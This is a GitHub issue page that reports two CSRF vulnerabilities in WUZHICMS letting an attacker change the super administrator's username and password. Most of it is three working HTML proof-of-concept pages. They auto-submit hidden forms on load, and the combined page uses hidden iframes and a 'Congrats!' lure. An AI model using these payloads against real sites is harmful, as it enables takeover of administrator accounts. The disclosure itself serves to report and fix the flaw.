Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Two CSRF vulnerabilities that can change the super administrator's username and password #156

Open
sfpskywood opened this issue Oct 25, 2018 · 0 comments

Comments

@sfpskywood
Copy link

When the super administrator (uid = 1) logged in, there are 2 important POST methods without CSRF protection, can change his username and password respectively. This can be achieved by cheating the super administrator to open the 2 pages when he logged in.
poc1.html (Change the username to 'hacker')

<!DOCTYPE html>
<html>
  <head>
  <title> CSRF Proof Of Concept - Change Super Admin Username</title>
  <script type="text/javascript">
    function exec1(){
      document.getElementById('form1').submit();
    }
  </script>
  </head>
  <body onload="exec1();">
    <form id="form1" action="http://localhost:8008/wuzhicms/index.php?m=member&f=index&v=edit&uid=1&_su=wuzhicms&_menuid=30&submit" method="POST">
      <input type="hidden" name="info&#91;username&#93;" value="hacker" />
      <input type="hidden" name="info&#91;email&#93;" value="xxx&#64;xxx&#46;xxx" />
      <input type="hidden" name="modelids&#91;&#93;" value="xxx" />
    </form>
  </body>
</html>

poc2.html (Change the password to '123456')

<!DOCTYPE html>
<html>
  <head>
  <title> CSRF Proof Of Concept - Change Super Admin Password</title>
  <script type="text/javascript">
    function exec2(){
      document.getElementById('form2').submit();
    }
  </script>
  </head>
  <body onload="exec2();">
    <form id="form2" action="http://localhost:8008/wuzhicms/index.php?m=core&f=panel&v=edit_info&_su=wuzhicms&_menuid=20&submit" method="POST">
      <input type="hidden" name="form&#91;password&#93;" value="123456" />
    </form>
  </body>
</html>

Or we made only 1 page POC to make it easy to attack.
poc.html

<!DOCTYPE html>
<html>
  <head>
  <title> CSRF Proof Of Concept - Put Them Together</title>
  <script type="text/javascript">
    function exec1(){
      document.getElementById('form1').submit();
      setTimeout(exec2, 3000);
    }
    function exec2(){
      document.getElementById('form2').submit();
    }
    window.onbeforeunload=function(){
      return "please wait";
    }
  </script>
  </head>
  <body onload="exec1();">
    <h3> Dear User </h3><h4><div id='r3'> Congrats! </div> </h4>
    <form id="form1" target="if1" action="http://localhost:8008/wuzhicms/index.php?m=member&f=index&v=edit&uid=1&_su=wuzhicms&_menuid=30&submit" method="POST">
      <input type="hidden" name="info&#91;username&#93;" value="hacker" />
      <input type="hidden" name="info&#91;email&#93;" value="xxx&#64;xxx&#46;xxx" />
      <input type="hidden" name="modelids&#91;&#93;" value="xxx" />
    </form>
    <form id="form2" target="if2" action="http://localhost:8008/wuzhicms/index.php?m=core&f=panel&v=edit_info&_su=wuzhicms&_menuid=20&submit" method="POST">
      <input type="hidden" name="form&#91;password&#93;" value="123456" />
    </form>
    <iframe name="if1" style="display: hidden=" width="0" height="0" frameborder="0"></iframe>
    <iframe name="if2" style="display: hidden=" width="0" height="0" frameborder="0"></iframe>
  </body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant